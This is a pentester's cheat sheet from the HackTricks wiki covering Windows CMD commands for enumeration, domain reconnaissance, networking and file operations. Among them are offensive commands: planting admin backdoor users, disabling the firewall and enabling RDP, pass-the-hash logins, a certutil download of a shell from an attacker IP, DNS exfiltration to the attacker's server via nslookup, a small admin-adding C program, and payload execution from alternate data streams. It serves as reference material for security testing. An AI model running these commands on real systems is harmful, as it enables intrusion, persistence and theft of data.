basic-cmd-for-pentesters.md (17110B)
1 --- 2 title: "Basic Win CMD for Pentesters" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/basic-cmd-for-pentesters.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/basic-cmd-for-pentesters.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Basic Win CMD for Pentesters 14 15 ## System info 16 17 ### Version and Patches info 18 19 ```bash 20 wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture 21 systeminfo 22 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information 23 wmic computersystem LIST full #Get PC info 24 25 wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches 26 wmic qfe list brief #Updates 27 where wmic 2>nul #WMIC is deprecated and may be absent on newer Windows 11 builds 28 powershell -c "Get-CimInstance Win32_OperatingSystem | select Caption,Version,BuildNumber,OSArchitecture" 29 powershell -c "Get-HotFix | select HotFixID,InstalledOn,Description" 30 31 hostname 32 33 DRIVERQUERY #3rd party driver vulnerable? 34 ``` 35 36 ### Environment 37 38 ```bash 39 set #List all environment variables 40 ``` 41 42 Some env variables to highlight: 43 44 - **COMPUTERNAME**: Name of the computer 45 - **TEMP/TMP:** Temp folder 46 - **USERNAME:** Your username 47 - **HOMEPATH/USERPROFILE:** Home directory 48 - **windir:** C:\Windows 49 - **OS**:Windos OS 50 - **LOGONSERVER**: Name of domain controller 51 - **USERDNSDOMAIN**: Domain name to use with DNS 52 - **USERDOMAIN**: Name of the domain 53 54 ```bash 55 nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC 56 ``` 57 58 ### Mounted disks 59 60 ```bash 61 (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) 62 wmic logicaldisk get caption,description,providername 63 ``` 64 65 ### [Defender](authentication-credentials-uac-and-efs/index.html#defender) 66 67 ### Recycle Bin 68 69 ```bash 70 dir C:\$Recycle.Bin /s /b 71 ``` 72 73 ### Processes, Services & Software 74 75 ```bash 76 schtasks /query /fo LIST /v #Verbose out of scheduled tasks 77 schtasks /query /fo LIST 2>nul | findstr TaskName 78 schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM 79 tasklist /V #List processes 80 tasklist /SVC #links processes to started services 81 net start #Windows Services started 82 wmic service list brief #List services 83 sc query #List of services 84 dir /a "C:\Program Files" #Installed software 85 dir /a "C:\Program Files (x86)" #Installed software 86 reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software 87 ``` 88 89 ## Domain info 90 91 ```bash 92 # Generic AD info 93 echo %USERDOMAIN% #Get domain name 94 echo %USERDNSDOMAIN% #Get domain name 95 echo %logonserver% #Get name of the domain controller 96 set logonserver #Get name of the domain controller 97 set log #Get name of the domain controller 98 gpresult /V # Get current policy applied 99 wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers 100 101 # Users 102 dsquery user #Get all users 103 net user /domain #List all users of the domain 104 net user <ACCOUNT_NAME> /domain #Get information about that user 105 net accounts /domain #Password and lockout policy 106 wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device 107 wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users 108 wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users 109 wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts. 110 111 # Groups 112 net group /domain #List of domain groups 113 net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here) 114 net group "Domain Admins" /domain #List users with domain admin privileges 115 net group "domain computers" /domain #List of PCs connected to the domain 116 net group "Domain Controllers" /domain #List PC accounts of domains controllers 117 wmic group list /format:list # Information about all local groups 118 wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups 119 wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group 120 wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group 121 122 # Computers 123 dsquery computer #Get all computers 124 net view /domain #Lis of PCs of the domain 125 nltest /dclist:<DOMAIN> #List domain controllers 126 wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers 127 wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers 128 129 # Trust relations 130 nltest /domain_trusts #Mapping of the trust relationships 131 132 # Get all objects inside an OU 133 dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" 134 ``` 135 136 ### Entra ID / Hybrid Join 137 138 Useful to quickly identify if the host is only AD-joined, Microsoft Entra joined, or hybrid joined, and whether the current user has a PRT cached for cloud SSO:<sup>[[1]](#references)</sup> 139 140 ```bash 141 dsregcmd /status 142 dsregcmd /status | findstr /i "AzureAdJoined EnterpriseJoined DomainJoined DeviceAuthStatus TenantName AzureAdPrt" 143 ``` 144 145 ### Logs & Events 146 147 ```bash 148 wevtutil el #List channels 149 wevtutil gl Security #Configuration and size of a log 150 wevtutil qe Security /rd:true /f:text /c:20 151 wevtutil qe Microsoft-Windows-PowerShell/Operational /rd:true /f:text /c:20 152 wevtutil qe Microsoft-Windows-Sysmon/Operational /rd:true /f:text /c:20 153 wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational /rd:true /f:text /c:20 154 wevtutil qe Microsoft-Windows-Windows Defender/Operational /rd:true /f:text /c:20 155 wevtutil epl Security C:\Temp\Security.evtx 156 157 #Make a security query using another credentials 158 wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321 159 ``` 160 161 ## Users & Groups 162 163 ### Users 164 165 ```bash 166 #Me 167 whoami /all #All info about me, take a look at the enabled tokens 168 whoami /priv #Show only privileges 169 170 # Local users 171 net users #All users 172 dir /b /ad "C:\Users" 173 net user %username% #Info about a user (me) 174 net accounts #Information about password requirements 175 wmic USERACCOUNT Get Domain,Name,Sid 176 net user /add [username] [password] #Create user 177 178 # Other logged-on users 179 qwinsta #Anyone else logged in? 180 181 #Lauch new cmd.exe with new creds (to impersonate in network) 182 runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted 183 184 #Check current logon session as administrator using logonsessions from sysinternals 185 logonsessions.exe 186 logonsessions64.exe 187 ``` 188 189 ### Groups 190 191 ```bash 192 #Local 193 net localgroup #All available groups 194 net localgroup Administrators #Info about a group (admins) 195 net localgroup administrators [username] /add #Add user to administrators 196 197 #Domain 198 net group /domain #Info about domain groups 199 net group /domain <domain_group_name> #Users that belongs to the group 200 ``` 201 202 ### List sessions 203 204 ```text 205 qwinsta 206 klist sessions 207 ``` 208 209 ### Password Policy 210 211 ```text 212 net accounts 213 ``` 214 215 ### Credentials 216 217 ```bash 218 cmdkey /list #List credential 219 vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault 220 rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access 221 ``` 222 223 ### Persistence with users 224 225 ```bash 226 # Add domain user and put them in Domain Admins group 227 net user username password /ADD /DOMAIN 228 net group "Domain Admins" username /ADD /DOMAIN 229 230 # Add local user and put them local Administrators group 231 net user username password /ADD 232 net localgroup Administrators username /ADD 233 234 # Add user to interesting groups: 235 net localgroup "Remote Desktop Users" UserLoginName /add 236 net localgroup "Debugger users" UserLoginName /add 237 net localgroup "Power users" UserLoginName /add 238 ``` 239 240 ## Network 241 242 ### Interfaces, Routes, Ports, Hosts and DNSCache 243 244 ```bash 245 ipconfig /all #Info about interfaces 246 route print #Print available routes 247 arp -a #Know hosts 248 netstat -ano #Opened ports? 249 type C:\WINDOWS\System32\drivers\etc\hosts 250 ipconfig /displaydns | findstr "Record" | findstr "Name Host" 251 ``` 252 253 ### Firewall 254 255 ```bash 256 netsh firewall show state # FW info, open ports 257 netsh advfirewall firewall show rule name=all 258 netsh firewall show config # FW info 259 Netsh Advfirewall show allprofiles 260 261 NetSh Advfirewall set allprofiles state off #Turn Off 262 NetSh Advfirewall set allprofiles state on #Trun On 263 netsh firewall set opmode disable #Turn Off 264 265 #How to open ports 266 netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138 267 netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139 268 netsh firewall add portopening TCP 3389 "Remote Desktop" 269 270 #Enable Remote Desktop 271 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 272 netsh firewall add portopening TCP 3389 "Remote Desktop" 273 ::netsh firewall set service remotedesktop enable #I found that this line is not needed 274 ::sc config TermService start= auto #I found that this line is not needed 275 ::net start Termservice #I found that this line is not needed 276 277 #Enable Remote Desktop with wmic 278 wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1" 279 ##or 280 wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" 281 282 #Enable Remote assistance: 283 reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f 284 netsh firewall set service remoteadmin enable 285 286 #Ninja combo (New Admin User, RDP + Rassistance + Firewall allow) 287 net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable 288 289 ::Connect to RDP (using hash or password) 290 xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49 291 xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49 292 ``` 293 294 ### Shares 295 296 ```bash 297 net view #Get a list of computers 298 net view /all /domain [domainname] #Shares on the domains 299 net view \\computer /ALL #List shares of a computer 300 net use x: \\computer\share #Mount the share locally 301 net share #Check current shares 302 ``` 303 304 ### Wifi 305 306 ```bash 307 netsh wlan show profile #AP SSID 308 netsh wlan show profile <SSID> key=clear #Get Cleartext Pass 309 ``` 310 311 ### SNMP 312 313 ```text 314 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 315 ``` 316 317 ### Network Interfaces 318 319 ```bash 320 ipconfig /all 321 ``` 322 323 ### ARP table 324 325 ```bash 326 arp -A 327 ``` 328 329 ### Packet capture without third-party tools 330 331 Windows Packet Monitor (`pktmon`) can capture packets and convert its ETL output to PCAPNG for analysis in tools such as Wireshark.<sup>[[2]](#references)</sup> 332 333 ```bash 334 pktmon filter remove 335 pktmon filter add -p 445 #Capture SMB only 336 pktmon start --capture --pkt-size 0 --file-name C:\Windows\Temp\pktmon.etl 337 pktmon stop 338 pktmon etl2pcap C:\Windows\Temp\pktmon.etl --out C:\Windows\Temp\pktmon.pcapng 339 340 netsh trace show interfaces 341 netsh trace start capture=yes tracefile=C:\Windows\Temp\nettrace.etl maxsize=256 filemode=circular 342 netsh trace stop 343 ``` 344 345 ## Download 346 347 Curl.exe 348 349 ```bash 350 curl.exe -k -L "https://10.10.14.13/tool.exe" -o C:\Windows\Temp\tool.exe 351 curl.exe -k -L "https://10.10.14.13/archive.zip" -o C:\Windows\Temp\archive.zip 352 tar -xf C:\Windows\Temp\archive.zip -C C:\Windows\Temp\ 353 ``` 354 355 Bitsadmin.exe 356 357 ```text 358 bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 359 ``` 360 361 CertReq.exe 362 363 ```text 364 CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt 365 ``` 366 367 Certutil.exe 368 369 ```text 370 certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe 371 ``` 372 373 **Find much more searching for `Download` in** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/) 374 375 ## Misc 376 377 ```bash 378 cd #Get current dir 379 cd C:\path\to\dir #Change dir 380 dir #List current dir 381 dir /a:h C:\path\to\dir #List hidden files 382 dir /s /b #Recursive list without shit 383 time #Get current time 384 date #Get current date 385 shutdown /r /t 0 #Shutdown now 386 type <file> #Cat file 387 388 #Runas 389 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials 390 runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted 391 392 #Hide 393 attrib +h file #Set Hidden 394 attrib -h file #Quit Hidden 395 396 #Give full control over a file that you owns 397 icacls <FILE_PATH> /t /e /p <USERNAME>:F 398 icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision 399 400 #Recursive copy to smb 401 xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win 402 403 #exe2bat to transform exe file in bat file 404 405 #ADS 406 dir /r #Detect ADS 407 more file.txt:ads.txt #read ADS 408 powershell (Get-Content file.txt -Stream ads.txt) 409 410 # Get error messages from code 411 net helpmsg 32 #32 is the code in that case 412 ``` 413 414 ### Bypass Char Blacklisting 415 416 ```bash 417 echo %HOMEPATH:~6,-11% #\ 418 who^ami #whoami 419 ``` 420 421 ### DOSfuscation 422 423 Generates an obfuscated CMD line 424 425 ```bash 426 git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git 427 cd Invoke-DOSfuscation 428 Import-Module .\Invoke-DOSfuscation.psd1 429 Invoke-DOSfuscation 430 help 431 SET COMMAND type C:\Users\Administrator\Desktop\flag.txt 432 encoding 433 ``` 434 435 ### Listen address ACLs 436 437 You can listen on [http://+:80/Temporary_Listen_Addresses/](http://+/Temporary_Listen_Addresses/) without being administrator. 438 439 ```bash 440 netsh http show urlacl 441 ``` 442 443 ### Manual DNS shell 444 445 **Attacker** (Kali) must use one of these 2 options: 446 447 ```bash 448 sudo responder -I <iface> #Active 449 sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive 450 ``` 451 452 #### Victim 453 454 **`for /f tokens`** technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server 455 456 ```bash 457 for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami 458 for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2 459 for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder 460 for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder 461 for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one 462 #More complex commands 463 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one 464 ``` 465 466 You can also **redirect** the output, and then **read** it. 467 468 ```text 469 whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt 470 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> 471 ``` 472 473 ## Calling CMD from C code 474 475 ```c 476 #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ 477 478 // When executed by Administrator this program will create a user and then add him to the administrators group 479 // i686-w64-mingw32-gcc addmin.c -o addmin.exe 480 // upx -9 addmin.exe 481 482 int main (){ 483 int i; 484 i=system("net users otherAcc 0TherAcc! /add"); 485 i=system("net localgroup administrators otherAcc /add"); 486 return 0; 487 } 488 ``` 489 490 ## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream) 491 492 **Examples taken from** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. There are a lot more in there!**<sup>[[3]](#references)</sup> 493 494 ```bash 495 ## Selected Examples of ADS Operations ## 496 497 ### Adding Content to ADS ### 498 # Append executable to a log file as an ADS 499 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" 500 # Download a script directly into an ADS 501 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt 502 503 ### Discovering ADS Content ### 504 # List files and their ADS 505 dir /R 506 # Use Sysinternals tool to list ADS of a file 507 streams.exe <c:\path\to\file> 508 509 ### Extracting Content from ADS ### 510 # Extract an executable stored in an ADS 511 expand c:\ads\file.txt:test.exe c:\temp\evil.exe 512 513 ### Executing ADS Content ### 514 # Execute an executable stored in an ADS using WMIC 515 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' 516 # Execute a script stored in an ADS using PowerShell 517 powershell -ep bypass - < c:\temp:ttt 518 ``` 519 520 521 ## References 522 523 - [1] [Microsoft Learn - Troubleshoot devices by using the `dsregcmd` command](https://learn.microsoft.com/en-us/entra/identity/devices/troubleshoot-device-dsregcmd) 524 - [2] [Microsoft Learn - Packet Monitor (`pktmon`)](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/pktmon) 525 - [3] [api0cradle - Alternate Data Streams Cheatsheet (gist)](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)